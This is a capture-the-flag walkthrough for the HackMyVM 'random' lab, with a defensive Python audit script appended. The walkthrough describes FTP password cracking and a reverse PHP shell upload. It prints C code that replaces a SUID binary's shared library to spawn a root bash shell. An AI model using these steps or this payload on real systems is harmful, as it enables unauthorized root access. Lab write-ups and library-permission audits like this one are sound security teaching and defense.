hackmyvm-random walkthrough

1. get reverse shell

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Browse port 80 to get the usernames eleanor and alan.
Crack the FTP service to get the user eleanor's password.
Use sftp to log in as eleanor, go to the path /html and upload a reverse PHP shell, then visit it to get a shell.

2. privilege escalation

Find the programs with the SUID bit set; we get the file /home/alan/random.
random uses the dynamic link library /lib/librooter.so, which we can replace.
Disassemble random with IDA.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  time_t v3; // rdi
  int v5; // [rsp+1Ch] [rbp-4h]

  v5 = atoi(argv[1]);
  v3 = time(0LL);
  srand(v3);
  if ( v5 == rand() % 9 + 1 )
    makemeroot(v3);
  else
    puts("Wrong number");
  return 0;
}

The check compares the argument with rand() % 9 + 1, a value from 1 to 9, so whatever the random number is, you reach the dynamically linked function makemeroot as long as you try a few more times. We recompile librooter.so with this code:

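#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

/* Replacement for the makemeroot() exported by /lib/librooter.so */
void makemeroot()
{
	setuid(0);
	setgid(0);
	system("/bin/bash");
}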

Try a few more times, then get root.
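Seen from the defender's side, the weakness used in step 2 is a SUID binary that loads a library a non-root user can replace. The Python check below is an added example, not part of the original walkthrough: it takes ldd output and reports every library whose file or parent directory is owned or writable by an untrusted user. SAMPLE_LDD is constructed (the addresses are made up) and the function names are hypothetical.

```python
import os
import re
import stat

# Constructed sample of `ldd /home/alan/random` output (addresses are made up).
SAMPLE_LDD = """\
\tlinux-vdso.so.1 (0x00007ffd3a5f2000)
\tlibrooter.so => /lib/librooter.so (0x00007f1c2a400000)
\tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1c2a200000)
\t/lib64/ld-linux-x86-64.so.2 (0x00007f1c2a600000)
"""

def parse_ldd(output):
    """Return the absolute library paths named in ldd output."""
    paths = []
    for line in output.splitlines():
        m = re.search(r"(?:=>\s*)?(/\S+)\s+\(0x[0-9a-f]+\)", line)
        if m:
            paths.append(m.group(1))
    return paths

def weak_points(path, trusted_uids=frozenset({0})):
    """List reasons a user outside trusted_uids could replace the file at path."""
    real = os.path.realpath(path)  # follow symlinks to the file actually loaded
    reasons = []
    for target in (real, os.path.dirname(real)):
        try:
            st = os.stat(target)
        except OSError as exc:
            reasons.append(f"{target}: cannot stat ({exc.strerror})")
            continue
        if st.st_uid not in trusted_uids:
            reasons.append(f"{target}: owned by uid {st.st_uid}")
        if st.st_mode & stat.S_IWOTH:
            reasons.append(f"{target}: world-writable")
        if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            reasons.append(f"{target}: writable by gid {st.st_gid}")
    return reasons

def audit(ldd_output, trusted_uids=frozenset({0})):
    """Map each library in ldd_output to its weak points, omitting clean ones."""
    checked = ((lib, weak_points(lib, trusted_uids)) for lib in parse_ldd(ldd_output))
    return {lib: found for lib, found in checked if found}

if __name__ == "__main__":
    for lib, found in audit(SAMPLE_LDD).items():
        print(lib, *found, sep="\n  ")
```

Feed audit() the ldd output of each SUID binary on the host; only the library file and its immediate parent directory are checked, so directories higher up the path need a separate review.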
